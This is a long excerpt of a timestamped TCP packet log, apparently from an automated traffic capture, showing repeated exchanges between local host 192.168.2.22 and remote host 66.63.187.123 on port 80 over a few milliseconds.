                                              Sep 26, 2024 09:19:23.063450098 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063467026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063483953 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063488007 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063502073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063502073 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063529015 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063543081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063605070 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063606024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063630104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063647985 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063652039 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063664913 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063666105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063679934 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063684940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063700914 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063714981 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063719034 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063739061 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063754082 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063811064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064053059 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064093113 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064097881 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064132929 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064191103 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064205885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064224005 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064234972 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064248085 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064260960 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064291954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064308882 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064326048 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064332008 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064343929 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064346075 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064363956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064383030 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064424038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064440012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064457893 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064467907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064482927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064491987 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064522982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064538956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064554930 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064562082 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064572096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064578056 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064589977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064591885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064609051 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064619064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064625978 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064630985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064646006 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064663887 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064759016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064802885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064842939 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064861059 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064877987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064886093 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064894915 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064898968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064912081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064913034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064929962 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.064930916 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064944983 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.064961910 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065095901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065112114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065129042 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065140009 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065156937 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065165043 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065243006 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065259933 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065277100 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065284967 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065294981 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065299034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065310955 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065325975 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065399885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065428019 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065443039 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065443993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065457106 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065460920 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065476894 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065479040 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065493107 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065494061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065509081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065511942 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065524101 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065529108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065545082 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065546989 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065562010 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065577984 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065642118 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065764904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065781116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065797091 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065805912 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065814972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065831900 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065839052 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065849066 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065853119 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065865993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065871000 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065882921 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065885067 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065898895 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065901041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.065915108 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.065937042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066128016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066143036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066159964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066171885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066189051 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066196918 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066225052 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066241026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066257954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066265106 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066277981 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066277981 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066293955 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066312075 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066396952 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066412926 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066430092 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066441059 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066447020 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066452026 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066464901 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066466093 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066479921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066502094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066565037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066592932 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066606998 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066621065 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066628933 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066637993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066654921 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066658020 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066672087 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066673040 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066687107 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066690922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066703081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066706896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066724062 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066725969 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066740036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066741943 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066757917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066780090 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066826105 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066911936 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066926956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066943884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066957951 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066961050 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066971064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066982031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.066982985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.066998959 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.067013025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070498943 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070514917 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070533037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070549011 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070554018 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070554972 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070568085 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070585012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070586920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070586920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070600986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070601940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070619106 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070628881 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070643902 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070652008 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070666075 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070682049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070698977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070705891 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070719004 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070734978 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070738077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070764065 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070780993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070780993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070794106 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070796967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070813894 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070816040 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070830107 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070832014 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070846081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070848942 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070866108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070867062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070883036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070883036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070899010 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070915937 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070919991 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070945978 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070955038 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070960999 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070977926 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.070982933 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.070998907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071013927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071018934 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071047068 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071047068 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071062088 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071078062 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071079016 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071099043 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071116924 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071121931 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071135044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071136951 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071155071 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071156979 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071167946 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071167946 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071178913 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071193933 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071197987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071209908 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071217060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071234941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071234941 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071252108 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071254015 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071268082 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071273088 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071280003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071293116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071295977 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071310997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071312904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071329117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071332932 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071345091 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071352959 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071372986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071374893 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071374893 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071399927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071407080 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071409941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071429968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071449041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071453094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071468115 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071468115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071485043 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071489096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071506023 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071508884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071521997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071527004 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071547031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071548939 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071564913 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071567059 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071580887 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071587086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071598053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071604967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071623087 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071628094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071643114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071643114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071657896 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071664095 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071680069 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071698904 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071731091 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071751118 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071769953 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071772099 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071788073 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071790934 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071805000 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071827888 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071876049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071894884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071913004 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.071933985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071933985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.071945906 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072067022 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072087049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072107077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072114944 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072128057 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072129011 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072143078 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072149038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072165966 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072177887 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072208881 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072251081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072392941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072411060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072431087 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072438002 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072451115 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072451115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072465897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072470903 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072487116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072491884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072508097 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072535038 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072566986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072586060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072603941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072606087 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072622061 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072624922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072638035 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072644949 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.072662115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.072679996 CEST4916180192.168.2.2266.63.187.123
